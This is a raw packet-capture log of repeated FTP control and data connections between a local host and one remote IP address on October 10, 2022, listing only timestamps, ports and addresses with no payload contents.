                                                                                                                                    Oct 10, 2022 06:02:36.470001936 CEST4978664556192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.471609116 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.471687078 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.471841097 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.496138096 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.496682882 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.496748924 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.606894016 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.630412102 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.630537033 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.659415960 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.659548998 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.659666061 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.659725904 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.659761906 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.659809113 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.659897089 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.684767962 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.684904099 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.685000896 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.709008932 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.709059000 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.709234953 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.732666969 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.732729912 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.732914925 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.758353949 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.758428097 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.758861065 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.782609940 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.782691956 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.783734083 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.810520887 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.810611963 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.810903072 CEST4978864557192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.833372116 CEST6455749788185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.833472967 CEST4978864557192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.833714962 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.857147932 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.857247114 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.857729912 CEST4978864557192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.880120039 CEST6455749788185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.880383015 CEST6455749788185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.880455017 CEST4978864557192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.881020069 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.881114006 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.881270885 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.905344963 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.905359030 CEST2149787185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.905430079 CEST4978721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.040793896 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.066812992 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.066992044 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.095493078 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.095583916 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.095733881 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.095798969 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.095860004 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.095968962 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.122353077 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.122510910 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.122680902 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.148624897 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.148777008 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.149111032 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.173909903 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.174052954 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.174221039 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.200021029 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.200135946 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.200932980 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.226635933 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.226872921 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.229041100 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.254961014 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.255086899 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.255326986 CEST4979064559192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.279598951 CEST6455949790185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.279742002 CEST4979064559192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.279988050 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.308787107 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.308891058 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.310937881 CEST4979064559192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.335652113 CEST6455949790185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.335711956 CEST6455949790185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.335793018 CEST4979064559192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.339905024 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.339972019 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.340135098 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.365757942 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.365801096 CEST2149789185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.365844965 CEST4978921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.495855093 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.520672083 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.520762920 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.548211098 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.548263073 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.548329115 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.548425913 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.548476934 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.549127102 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.575745106 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.575864077 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.585671902 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.610559940 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.610642910 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.610932112 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.634429932 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.634500027 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.634660006 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.659218073 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.659312963 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.659893990 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.684673071 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.684775114 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.685736895 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.712605953 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.712698936 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.713068962 CEST4979264560192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.735969067 CEST6456049792185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.736092091 CEST4979264560192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.736520052 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.761668921 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.761789083 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.763210058 CEST4979264560192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.785936117 CEST6456049792185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.786235094 CEST6456049792185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.786320925 CEST4979264560192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.786766052 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.786832094 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.786973953 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.811943054 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.811994076 CEST2149791185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.812058926 CEST4979121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.929658890 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.952725887 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.952833891 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.978769064 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.978816986 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.978880882 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.978880882 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.979085922 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:37.979140997 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:37.979722977 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.002377033 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.002530098 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.002686977 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.025451899 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.025564909 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.025948048 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.048686981 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.048788071 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.048963070 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.072110891 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.072215080 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.073852062 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.097069979 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.097337961 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.098191977 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.121192932 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.121337891 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.123944044 CEST4979464561192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.147381067 CEST6456149794185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.147492886 CEST4979464561192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.148055077 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.173963070 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.174125910 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.177064896 CEST4979464561192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.201236010 CEST6456149794185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.201627016 CEST6456149794185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.201714039 CEST4979464561192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.201910973 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.202018023 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.205842018 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.228373051 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.228420019 CEST2149793185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.228624105 CEST4979321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.358285904 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.381371021 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.381694078 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.407860041 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.408018112 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.408164978 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.408236027 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.408404112 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.408597946 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.432120085 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.432234049 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.432569981 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.455782890 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.456001997 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.456238031 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.479656935 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.479811907 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.480190039 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.503688097 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.503896952 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.504631042 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.528242111 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.528451920 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.529531002 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.553328037 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.555098057 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.560523033 CEST4979664562192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.583514929 CEST6456249796185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.583638906 CEST4979664562192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.583982944 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.607872009 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.611418962 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.612437010 CEST4979664562192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.635303020 CEST6456249796185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.635394096 CEST6456249796185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.635551929 CEST4979664562192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.636274099 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.640671015 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.640782118 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.663568020 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.663644075 CEST2149795185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.663769007 CEST4979521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.781936884 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.804841042 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.804966927 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.831074953 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.831104994 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.831113100 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.831439972 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.831676960 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.854669094 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.859026909 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.859213114 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.882015944 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.882128000 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.882380962 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.905299902 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.905457973 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.905644894 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.928903103 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.929126978 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.929975033 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.952801943 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.954948902 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.956623077 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.979994059 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:38.980156898 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:38.980504036 CEST4979864563192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.006619930 CEST6456349798185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.006860971 CEST4979864563192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.007491112 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.031630993 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.031949997 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.032907009 CEST4979864563192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.059000969 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.059138060 CEST6456349798185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.059237957 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.059372902 CEST6456349798185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.059458017 CEST4979864563192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.074465036 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.097062111 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.097232103 CEST2149797185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.097326040 CEST4979721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.218770981 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.243318081 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.243571043 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.273478031 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.273524046 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.273686886 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.273902893 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.273983955 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.274092913 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.299926043 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.301651955 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.301847935 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.326097012 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.327266932 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.327428102 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.352384090 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.354773045 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.354866028 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.380497932 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.382822037 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.383482933 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.410026073 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.410481930 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.411715984 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.438208103 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.438322067 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.438705921 CEST4980064565192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.463282108 CEST6456549800185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.463413000 CEST4980064565192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.463953972 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.488548994 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.491106033 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.491502047 CEST4980064565192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.514122963 CEST6456549800185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.514168978 CEST6456549800185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.514235973 CEST4980064565192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.514585972 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.515005112 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.515136003 CEST4979921192.168.2.3185.106.92.60
